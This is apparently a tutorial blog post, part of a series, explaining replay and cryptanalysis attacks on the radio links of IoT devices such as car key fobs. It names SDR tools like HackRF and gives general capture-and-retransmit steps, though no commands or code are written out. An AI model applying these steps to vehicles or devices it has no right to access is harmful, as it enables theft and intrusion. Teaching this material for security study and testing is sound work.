This is part 4 of the “IoT Radio Communication Attack” series. It is important that you read the other three articles to gain a good understanding of the material covered in this article.

What We’ll Learn – This article describes the various attacks that are possible on the radio communication component of an IoT device. Furthermore, the methodology of the attack will be examined, as well as the tools that are used and how the attack can be carried out using them. The theory behind various attacks on radio communications will also be reviewed.

Radio Communication – First, let’s understand what radio communication is so that it is easy to understand how different attacks can occur. Look at the image below.

Pictured above is a car and a key fob for locking and unlocking the vehicle. One presses a button and the car locks/unlocks based on the key pressed.

When you press a key, some data is transferred in binary format. The data is obtained after reversing the radio communication, which we will explore in a future article. This binary data contains the logic of locking/unlocking the car. So, based on the binary data that is transmitted, the car is locked or unlocked.

Below are the attacks that can be performed on the radio communication component of any IoT device:

Replay Attack – This is the most common threat. It is also straightforward due to its considerable use by cyber attackers. As the name suggests, the original data is played back to the IoT device to perform the actual attack.
Tools used – HackRF, BladeRF, RTL-SDR, FUNcube dongle, GQRX, SDR#, URH etc.

Steps to perform the attack -[IoT Radio Communication Attack]

Capturing the original data transmitted to the IoT device – To capture the transmitted data, we can use hardware devices (hereafter referred to as “tools” in the rest of this article), such as HackRF, RTL-SDR, FUNcube dongle, BladeRF, etc.

Finding Transmission Frequency – Whenever any IoT device transmits/receives data, it sends and receives it at a specific frequency. Therefore, the identification of the frequency channel is of the utmost importance. The frequency for an IoT device can be easily found by searching for the device’s FCC ID number. If it is not listed on the device, you must search for it manually. Most devices communicate on the 313-318 MHz or 433 MHz channel.

Hardware Device Tuning – Once you determine the actual frequency, the hardware device should tune to it to capture the transmitted/received data.
Save data for transfer – After tuning the device, the transferred data should be captured and saved to the local computer. After saving it, the captured data should then be transferred to launch a replay attack.

Also Read:Everything you need to know about Ethical Hacking as a Career by Blackhat Pakistan 2023

Among all the tools described in this article, HackRF is the most widely used. The scope of the article will thus be limited to the HackRF tool.

The Replay Attack that HackRF launches is shown in the screenshot below:

In the image above, the transmitted data is captured in a raw file called connector.raw, and the data is sampled at a frequency of 433.9 Mhz.

As shown above, the captured raw file (connector.raw) is transmitted using the HackRF tool on the 433.9 Mhz frequency channel. This is used to trigger the actual Replay Attack.

This is how Replay Attack is launched using HackRF:

Cryptanalysis Attack – This method involves reversing the communication flow of an IoT device. For example, the original data that is transmitted to an IoT device is analyzed and then inverted to obtain a binary form. This attack is difficult to perform because it needs the exact data in binary form, as well as the modulation technique used and the bit rate of the transmission being transmitted. If the data and baud rate do not exactly match, the attack cannot be launched.
Tools used – HackRF, CC1111, RTL-SDR, SDR#, GNURadio, rfcat, Audacity, etc.

Steps to perform the attack –

Capture the original data that is transmitted to the IoT device – The procedure is the same as when launching a Replay Attack.
Data analysis and processing – In this step, the obtained data is analyzed and processed to find the modulation scheme. The analyzed data is then used for the purposes of demodulation, removing any extraneous noise, increasing the signal strength, identifying the bit rate, etc.
Reverse Engineering – Once the data is analyzed and processed, binary data is obtained. Once we have the baud rate and modulation
the data is then sent back to the IoT device to launch the actual attack. This kind of attack is complicated compared to replay attack.
These are two types of attacks that are widely performed on the radio communication component of IoT devices. This article deals with the theory of these attacks. The next one will provide real examples of these kinds of attacks.

References –

Remote Car Starter: How Does Keyless Entry Work?

http://sh3llc0d3r.com/iot-replay-attack-with-hackrf/